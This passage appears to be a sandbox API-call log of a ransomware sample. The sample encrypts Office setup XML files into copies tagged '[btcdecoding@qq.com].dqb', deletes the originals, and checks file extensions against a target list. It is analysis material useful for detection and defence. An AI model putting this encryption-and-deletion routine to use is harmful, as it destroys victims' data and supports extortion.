Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.212] lstrlenW (lpString=".zip") returned 4 [0039.212] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.212] lstrlenW (lpString=".rar") returned 4 [0039.212] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString=".bz2") returned 4 [0039.212] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString=".7z") returned 3 [0039.212] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.212] lstrlenW (lpString=".dbf") returned 4 [0039.212] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.213] lstrlenW (lpString=".1cd") returned 4 [0039.213] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.213] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0039.213] lstrlenW (lpString=".jpg") returned 4 [0039.213] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.213] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.213] lstrlenW (lpString="PowerPointMUI.XML") returned 17 [0039.213] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.213] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1450) returned 1 [0039.213] CloseHandle (hObject=0x174) returned 1 [0039.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 0x20 [0039.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.213] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.213] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.214] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.214] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.215] GetLastError () returned 0x0 [0039.215] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x5aa, lpOverlapped=0x0) returned 1 [0039.217] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0039.218] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.218] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0039.218] SetEndOfFile (hFile=0x1a4) returned 1 [0039.218] CloseHandle (hObject=0x1a4) returned 1 [0039.219] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.219] SetEndOfFile (hFile=0x174) returned 1 [0039.219] CloseHandle (hObject=0x174) returned 1 [0039.219] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.220] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml")) returned 1 [0039.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.220] lstrlenW (lpString=".doc") returned 4 [0039.220] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.220] lstrlenW (lpString=".docx") returned 5 [0039.220] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.220] lstrlenW (lpString=".pdf") returned 4 [0039.220] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.220] lstrlenW (lpString=".xls") returned 4 [0039.220] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.220] lstrlenW (lpString=".xlsx") returned 5 [0039.220] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.220] lstrlenW (lpString=".ppt") returned 4 [0039.220] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.220] lstrlenW (lpString=".zip") returned 4 [0039.220] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.220] lstrlenW (lpString=".rar") returned 4 [0039.220] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.220] lstrlenW (lpString=".bz2") returned 4 [0039.220] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.220] lstrlenW (lpString=".7z") returned 3 [0039.220] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.220] lstrlenW (lpString=".dbf") returned 4 [0039.220] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.221] lstrlenW (lpString=".1cd") returned 4 [0039.221] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.221] lstrlenW (lpString=".jpg") returned 4 [0039.221] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.221] lstrlenW (lpString=".doc") returned 4 [0039.221] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString=".docx") returned 5 [0039.221] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.221] lstrlenW (lpString=".pdf") returned 4 [0039.221] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString=".xls") returned 4 [0039.221] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString=".xlsx") returned 5 [0039.221] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.221] lstrlenW (lpString=".ppt") returned 4 [0039.221] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.221] lstrlenW (lpString=".zip") returned 4 [0039.221] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.221] lstrlenW (lpString=".rar") returned 4 [0039.221] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString=".bz2") returned 4 [0039.221] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString=".7z") returned 3 [0039.221] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.221] lstrlenW (lpString=".dbf") returned 4 [0039.221] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.221] lstrlenW (lpString=".1cd") returned 4 [0039.222] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML") returned 114 [0039.222] lstrlenW (lpString=".jpg") returned 4 [0039.222] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.222] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.222] lstrlenW (lpString="SETUP.XML") returned 9 [0039.222] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.223] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1886) returned 1 [0039.223] CloseHandle (hObject=0x174) returned 1 [0039.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 0x20 [0039.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.223] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.223] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.223] GetLastError () returned 0x0 [0039.223] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x75e, lpOverlapped=0x0) returned 1 [0039.225] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x760, lpOverlapped=0x0) returned 1 [0039.226] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.226] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.226] SetEndOfFile (hFile=0x1a4) returned 1 [0039.226] CloseHandle (hObject=0x1a4) returned 1 [0039.226] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.227] SetEndOfFile (hFile=0x174) returned 1 [0039.227] CloseHandle (hObject=0x174) returned 1 [0039.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.228] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 1 [0039.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.228] lstrlenW (lpString=".doc") returned 4 [0039.228] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.228] lstrlenW (lpString=".docx") returned 5 [0039.228] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.228] lstrlenW (lpString=".pdf") returned 4 [0039.228] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.228] lstrlenW (lpString=".xls") returned 4 [0039.228] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.228] lstrlenW (lpString=".xlsx") returned 5 [0039.228] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.228] lstrlenW (lpString=".ppt") returned 4 [0039.228] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.228] lstrlenW (lpString=".zip") returned 4 [0039.228] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.228] lstrlenW (lpString=".rar") returned 4 [0039.228] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.228] lstrlenW (lpString=".bz2") returned 4 [0039.228] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.228] lstrlenW (lpString=".7z") returned 3 [0039.228] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.228] lstrlenW (lpString=".dbf") returned 4 [0039.228] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.229] lstrlenW (lpString=".1cd") returned 4 [0039.229] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.229] lstrlenW (lpString=".jpg") returned 4 [0039.229] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.229] lstrlenW (lpString=".doc") returned 4 [0039.229] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString=".docx") returned 5 [0039.229] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.229] lstrlenW (lpString=".pdf") returned 4 [0039.229] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString=".xls") returned 4 [0039.229] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString=".xlsx") returned 5 [0039.229] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.229] lstrlenW (lpString=".ppt") returned 4 [0039.229] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.229] lstrlenW (lpString=".zip") returned 4 [0039.229] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.229] lstrlenW (lpString=".rar") returned 4 [0039.229] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString=".bz2") returned 4 [0039.229] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString=".7z") returned 3 [0039.229] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.229] lstrlenW (lpString=".dbf") returned 4 [0039.229] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.230] lstrlenW (lpString=".1cd") returned 4 [0039.230] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0039.230] lstrlenW (lpString=".jpg") returned 4 [0039.230] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.230] lstrcmpiW (lpString1=".XML", lpString2=".dqb") returned 1 [0039.230] lstrlenW (lpString="PrjProrWW.XML") returned 13 [0039.230] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.231] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=6421) returned 1 [0039.231] CloseHandle (hObject=0x174) returned 1 [0039.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 0x20 [0039.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0039.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0039.231] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.231] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.232] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.232] GetLastError () returned 0x0 [0039.232] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1915, lpOverlapped=0x0) returned 1 [0039.707] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1920, lpOverlapped=0x0) returned 1 [0039.708] ReadFile (in: hFile=0x174, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.708] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xee, lpOverlapped=0x0) returned 1 [0039.708] SetEndOfFile (hFile=0x1a4) returned 1 [0039.806] CloseHandle (hObject=0x1a4) returned 1 [0039.806] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.806] SetEndOfFile (hFile=0x174) returned 1 [0039.807] CloseHandle (hObject=0x174) returned 1 [0039.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0039.808] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 1 [0039.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.808] lstrlenW (lpString=".doc") returned 4 [0039.808] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.808] lstrlenW (lpString=".docx") returned 5 [0039.808] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0039.808] lstrlenW (lpString=".pdf") returned 4 [0039.808] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.808] lstrlenW (lpString=".xls") returned 4 [0039.808] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.808] lstrlenW (lpString=".xlsx") returned 5 [0039.808] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0039.808] lstrlenW (lpString=".ppt") returned 4 [0039.808] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.808] lstrlenW (lpString=".zip") returned 4 [0039.808] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.808] lstrlenW (lpString=".rar") returned 4 [0039.808] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.808] lstrlenW (lpString=".bz2") returned 4 [0039.808] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.808] lstrlenW (lpString=".7z") returned 3 [0039.808] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.809] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0039.809] lstrlenW (lpString=".dbf") returned 4 [0039.809] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.809] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 